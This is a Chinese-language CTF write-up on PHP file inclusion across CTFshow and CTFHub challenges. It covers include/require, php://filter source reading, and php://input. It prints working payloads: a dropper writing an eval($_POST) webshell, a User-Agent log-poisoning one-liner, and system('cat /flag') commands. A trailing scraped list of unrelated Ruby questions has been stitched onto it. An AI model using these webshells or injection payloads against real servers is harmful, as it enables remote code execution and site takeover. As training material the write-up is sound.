jjzjj

基于CTFshow的web4下的文件包含学习

Cyber Striver 2023-07-01 原文

CTFshow web4

题目场景

​ 打开题目链接,如下图所示:

考点:文件包含(a kind of 代码注入)

1、定义

2、常见类型

  1. include()
  2. include_once()
  3. require()
  4. require_once()

3、解题思路

​ 判断远程文件包含:下列两项都处于ON模式


4、Demos

1.demo1

2.demo2

https://www.php.net/manual/zh/wrappers.php


http://4.chinalover.sinaapp.com/web7/index.php

点击”click me?no“ 发现如下:

?file=php://filter/read=convert.base64-encode/resource=index.php
  1. 这道题不知道绝对路径,所以排除file协议用filter。
  2. ”resource=“,可以指定要筛选的数据流。
  3. ”read=“,可以设定过滤器的名称。
  4. 读取index.php的内容,并把输入流进行base64编码输出。
  5. 进行base64编码是因为:不编码会被当成php文件执行,就无法看见flag内容。

3、demo3

条件:只要allow_url_include=on便可以。

代码审计

注释:

​ 1.看php.ini文件

​ 2.rfi:Remote file inclusion. 不能使用远程文件包含。

​ 访问php.ini文件,发现allow_url_include=on尝试使用php://input写入木马。

木马文件
<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["xxx"]);?>')?>

使用HackBar上传php木马,生成shell.php的木马文件。

连接,访问flag.txt。

4.demo4

双开启:考虑远程文件包含

?param=url
一句话木马:<?php eval(POST['hacker'])?>

知识点

  1. PHP 是一种创建动态交互性站点的强有力的服务器端脚本语言。(PHP是一个拥有众多开发者的开源软件项目,最开始是Personal Home Page的缩写,已经正式更名为 “PHP: Hypertext Preprocessor”:超文本预处理器)

  2. PHP 脚本以 <?php** 开始,以 **?> 结束:

    <?php
     // PHP 代码
     ?>
    
  3. include()。在 PHP 中,您可以在服务器执行 PHP 文件之前在该文件中插入一个文件的内容。include 和 require 语句用于在执行流中插入写在其他文件中的有用的代码。

  4. 在 PHP 中,预定义的 $_GET 变量用于收集来自 method=“get” 的表单中的值。

    预定义的 $_GET 变量用于收集来自 method=“get” 的表单中的值。

    从带有 GET 方法的表单发送的信息,对任何人都是可见的(会显示在浏览器的地址栏),并且对发送信息的量也有限制。

  5. 预定义的 $_POST 变量用于收集来自 method=“post” 的表单中的值。

    从带有 POST 方法的表单发送的信息,对任何人都是不可见的(不会显示在浏览器的地址栏),并且对发送信息的量也没有限制。

  6. 包含日志文件,查看日志文件的信息,可以看到日志文件中保存了网站的访问记录,包括HTTP请求行,Referer,User-Agent等HTTP请求的信息

  7. eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。

<?php eval($_POST['a']);?>

​ 使用代理工具将<?php eval($_POST['a']);?>插入到”User-Agent“后面而不是另起一行!

  1. 通过剑蚁连接,密码伟为<?php eval($_POST['a']);?>中的”a“
  2. 使用文件管理功能找到flag.txt.得到flag。

CTFHub文件包含实战

1、文件包含

题目场景:

<?php
error_reporting(0);  		//取消报错
if (isset($_GET['file'])) {   //判断是否通过get接收到参数”file“
    if (!strpos($_GET["file"], "flag")) { //判断接收到的file参数中是否包含”flag”字段
        include $_GET["file"];//如果接收到的内容不含flag字段,就include包含文件
    } 
    else {
        echo "Hacker!!!";	//不满足if条件,即包含有flag,打印出“Hacker!!!”
    }
} else {
    highlight_file(__FILE__);  //highlight_file() 函数对文件进行 PHP 语法高亮显示。语法通过使用 HTML 标签进行高亮。
}
?>

点击shell之后出现如下页面:

<?php eval($_REQUEST['ctfhub']);?>  //密码为ctfhub的一句话木马

解题思路:

​ 现在题目已经给了我们一句话木马,我们应该想该如何去使用它,即是如何将shell.txt中的内容放到index.php中

根据源码,构造payloa上传木马文件。

剑蚁连接得到flag。

其中剑蚁连接后手动去找flag比较麻烦,推荐使用虚拟终端然后输入: cat /flag

2、php://input

查看phpinfo发现allow_url_include=on,即可以使用php://input

<?php system("ls /")?>  //显示根目录

成功执行,发现flag文件

<?php system("cat /flag_16467")?>  //查找显示flag文件

得到flag

3、读取源代码

题目页面场景:

file参数内容里前6个字符必须是php://

考虑使用php://filter,其可以作为一个中间流来处理其他流,具有四个参数:

名称描述备注
resource=<要过滤的数据流>指定了你要筛选过滤的数据流。必选
read=<读链的筛选列表>可以设定一个或多个过滤器名称,以管道符()分隔。
write=<写链的筛选列表>可以设定一个或多个过滤器名称,以管道符()分隔。
<;两个链的筛选列表>任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。

直接构造payload:

/?file=php://filter/read=convert.base64-encode/resource=/flag

然后base64解码得到flag。

4、远程包含


另一种方法的思路是:在服务器上建立一个一句话木马文件,然后上传到目标网页上。后用剑蚁连接得到flag。(我暂时没有用服务器就没采用这种方法。)

有关基于CTFshow的web4下的文件包含学习的更多相关文章

  1. ruby - 使用 RubyZip 生成 ZIP 文件时设置压缩级别 - 2

    我有一个Ruby程序,它使用rubyzip压缩XML文件的目录树。gem。我的问题是文件开始变得很重,我想提高压缩级别,因为压缩时间不是问题。我在rubyzipdocumentation中找不到一种为创建的ZIP文件指定压缩级别的方法。有人知道如何更改此设置吗?是否有另一个允许指定压缩级别的Ruby库? 最佳答案 这是我通过查看ruby​​zip内部创建的代码。level=Zlib::BEST_COMPRESSIONZip::ZipOutputStream.open(zip_file)do|zip|Dir.glob("**/*")d

  2. ruby - 其他文件中的 Rake 任务 - 2

    我试图在一个项目中使用rake,如果我把所有东西都放到Rakefile中,它会很大并且很难读取/找到东西,所以我试着将每个命名空间放在lib/rake中它自己的文件中,我添加了这个到我的rake文件的顶部:Dir['#{File.dirname(__FILE__)}/lib/rake/*.rake'].map{|f|requiref}它加载文件没问题,但没有任务。我现在只有一个.rake文件作为测试,名为“servers.rake”,它看起来像这样:namespace:serverdotask:testdoputs"test"endend所以当我运行rakeserver:testid时

  3. ruby-on-rails - 在 Rails 中将文件大小字符串转换为等效千字节 - 2

    我的目标是转换表单输入,例如“100兆字节”或“1GB”,并将其转换为我可以存储在数据库中的文件大小(以千字节为单位)。目前,我有这个:defquota_convert@regex=/([0-9]+)(.*)s/@sizes=%w{kilobytemegabytegigabyte}m=self.quota.match(@regex)if@sizes.include?m[2]eval("self.quota=#{m[1]}.#{m[2]}")endend这有效,但前提是输入是倍数(“gigabytes”,而不是“gigabyte”)并且由于使用了eval看起来疯狂不安全。所以,功能正常,

  4. ruby-on-rails - Rails 3 中的多个路由文件 - 2

    Rails2.3可以选择随时使用RouteSet#add_configuration_file添加更多路由。是否可以在Rails3项目中做同样的事情? 最佳答案 在config/application.rb中:config.paths.config.routes在Rails3.2(也可能是Rails3.1)中,使用:config.paths["config/routes"] 关于ruby-on-rails-Rails3中的多个路由文件,我们在StackOverflow上找到一个类似的问题

  5. ruby - 将差异补丁应用于字符串/文件 - 2

    对于具有离线功能的智能手机应用程序,我正在为Xml文件创建单向文本同步。我希望我的服务器将增量/差异(例如GNU差异补丁)发送到目标设备。这是计划:Time=0Server:hasversion_1ofXmlfile(~800kiB)Client:hasversion_1ofXmlfile(~800kiB)Time=1Server:hasversion_1andversion_2ofXmlfile(each~800kiB)computesdeltaoftheseversions(=patch)(~10kiB)sendspatchtoClient(~10kiBtransferred)Cl

  6. ruby - 如何将脚本文件的末尾读取为数据文件(Perl 或任何其他语言) - 2

    我正在寻找执行以下操作的正确语法(在Perl、Shell或Ruby中):#variabletoaccessthedatalinesappendedasafileEND_OF_SCRIPT_MARKERrawdatastartshereanditcontinues. 最佳答案 Perl用__DATA__做这个:#!/usr/bin/perlusestrict;usewarnings;while(){print;}__DATA__Texttoprintgoeshere 关于ruby-如何将脚

  7. ruby - 使用 Vim Rails,您可以创建一个新的迁移文件并一次性打开它吗? - 2

    使用带有Rails插件的vim,您可以创建一个迁移文件,然后一次性打开该文件吗?textmate也可以这样吗? 最佳答案 你可以使用rails.vim然后做类似的事情::Rgeneratemigratonadd_foo_to_bar插件将打开迁移生成的文件,这正是您想要的。我不能代表textmate。 关于ruby-使用VimRails,您可以创建一个新的迁移文件并一次性打开它吗?,我们在StackOverflow上找到一个类似的问题: https://sta

  8. Ruby 写入和读取对象到文件 - 2

    好的,所以我的目标是轻松地将一些数据保存到磁盘以备后用。您如何简单地写入然后读取一个对象?所以如果我有一个简单的类classCattr_accessor:a,:bdefinitialize(a,b)@a,@b=a,bendend所以如果我从中非常快地制作一个objobj=C.new("foo","bar")#justgaveitsomerandomvalues然后我可以把它变成一个kindaidstring=obj.to_s#whichreturns""我终于可以将此字符串打印到文件或其他内容中。我的问题是,我该如何再次将这个id变回一个对象?我知道我可以自己挑选信息并制作一个接受该信

  9. ruby - 如何使用 Ruby aws/s3 Gem 生成安全 URL 以从 s3 下载文件 - 2

    我正在编写一个小脚本来定位aws存储桶中的特定文件,并创建一个临时验证的url以发送给同事。(理想情况下,这将创建类似于在控制台上右键单击存储桶中的文件并复制链接地址的结果)。我研究过回形针,它似乎不符合这个标准,但我可能只是不知道它的全部功能。我尝试了以下方法:defauthenticated_url(file_name,bucket)AWS::S3::S3Object.url_for(file_name,bucket,:secure=>true,:expires=>20*60)end产生这种类型的结果:...-1.amazonaws.com/file_path/file.zip.A

  10. ruby - rspec 需要 .rspec 文件中的 spec_helper - 2

    我注意到像bundler这样的项目在每个specfile中执行requirespec_helper我还注意到rspec使用选项--require,它允许您在引导rspec时要求一个文件。您还可以将其添加到.rspec文件中,因此只要您运行不带参数的rspec就会添加它。使用上述方法有什么缺点可以解释为什么像bundler这样的项目选择在每个规范文件中都需要spec_helper吗? 最佳答案 我不在Bundler上工作,所以我不能直接谈论他们的做法。并非所有项目都checkin.rspec文件。原因是这个文件,通常按照当前的惯例,只

随机推荐